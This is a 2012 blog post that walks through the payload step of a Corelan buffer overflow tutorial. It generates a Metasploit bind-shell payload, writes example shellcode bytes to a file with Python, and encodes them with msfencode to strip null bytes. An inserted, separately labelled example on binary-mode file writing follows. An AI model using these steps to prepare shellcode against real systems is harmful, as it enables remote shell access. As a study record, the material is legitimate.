Saturday, November 10, 2012

Buffer Overflow - Some thoughts

In this post I'll talk about Buffer Overflow Exploitation in Windows.

Keep in mind that this is not intended to teach you anything; this blog is for personal use and will contain info that I don't want to lose or forget. Anyway, I share it with everyone, so that it can be helpful for other people.

I learned about buffer overflows from the link below, one of the many tutorials by the Corelan Team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

That is an extremely good tutorial, one that you can actually follow and understand, and especially one that you can test yourself.

At the end of the tutorial there is a kind of challenge, where you should make your shellcode give you a telnet connection to the remote computer. Getting that shellcode into the exploit is the challenge part.

The way I found to do it was:

Get the payload from msfpayload:

msfpayload windows/shell_bind_tcp


That will create the shellcode for a telnet connection with an open port at 4444 (the default).

Now, if you test it, it will not work, because it probably contains nulls and other bad chars not supported by the RMtoMP3 application, so we have to use an encoder.

Here comes the trick:

Step 1

Imagine this is the shellcode (this is just an example):

\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18
\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b
\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac
\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4
\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b

 
What you have to do is create a script that writes the shellcode to a binary file.
For this example, I will use Python as the script language:

#!/usr/bin/python

# Shellcode as a bytes literal, so every \x.. escape is exactly one byte
shell = (b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
# Open in binary mode ('wb'): text mode can alter bytes on the way to disk
file = open('shellcode.bin','wb')
file.write(shell)
file.close()
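
Why the file has to be opened in binary mode, shown as an added example that is not part of the original post: it writes a constructed byte string (every value from 0x00 to 0xff) through a text-mode handle and a binary-mode handle and compares what lands on disk. The UTF-8 encoding and the '\r\n' newline setting are assumptions standing in for Python 3 text mode on Windows, and all function names are hypothetical.

```python
import os
import tempfile

# Constructed sample: every byte value once, so each failure mode is hit.
SAMPLE = bytes(range(256))

def write_text_mode(data, path):
    # Assumption: models open(path, 'w') in Python 3 on Windows, where the
    # string is encoded (UTF-8 here) and each LF is expanded to CR LF.
    with open(path, "w", encoding="utf-8", newline="\r\n") as fh:
        fh.write(data.decode("latin-1"))

def write_binary_mode(data, path):
    # Binary mode: the bytes go to disk untouched.
    with open(path, "wb") as fh:
        fh.write(data)

def first_mismatch(expected, actual):
    # Offset of the first differing byte, or None when both are identical.
    for offset, (a, b) in enumerate(zip(expected, actual)):
        if a != b:
            return offset
    if len(expected) != len(actual):
        return min(len(expected), len(actual))
    return None

def round_trip(writer, data=SAMPLE):
    # Write data with the given writer and return the bytes found on disk.
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "blob.bin")
        writer(data, path)
        with open(path, "rb") as fh:
            return fh.read()

if __name__ == "__main__":
    for writer in (write_text_mode, write_binary_mode):
        on_disk = round_trip(writer)
        print(writer.__name__, len(on_disk), first_mismatch(SAMPLE, on_disk))
```

In text mode the file grows because every byte from 0x80 upward becomes a two-byte UTF-8 sequence and the 0x0a byte gains a leading 0x0d; in binary mode the file is byte-for-byte identical to the input.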

 
Step 2

After running the script you will have a shellcode.bin file. Now it is time to use our encoder:

msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c

Where:

-e ... -> is the type of encoder you want to use. You can get a list of them using msfencode -l

-b ... -> is the characters you want to avoid, in this case the null

-i ... -> is the file you want to encode

and

-t ... -> is the output file format

With all this set, you now have the correct shellcode, and just need to add it to your own exploit.

Send it to the victim machine and Voilà!!!
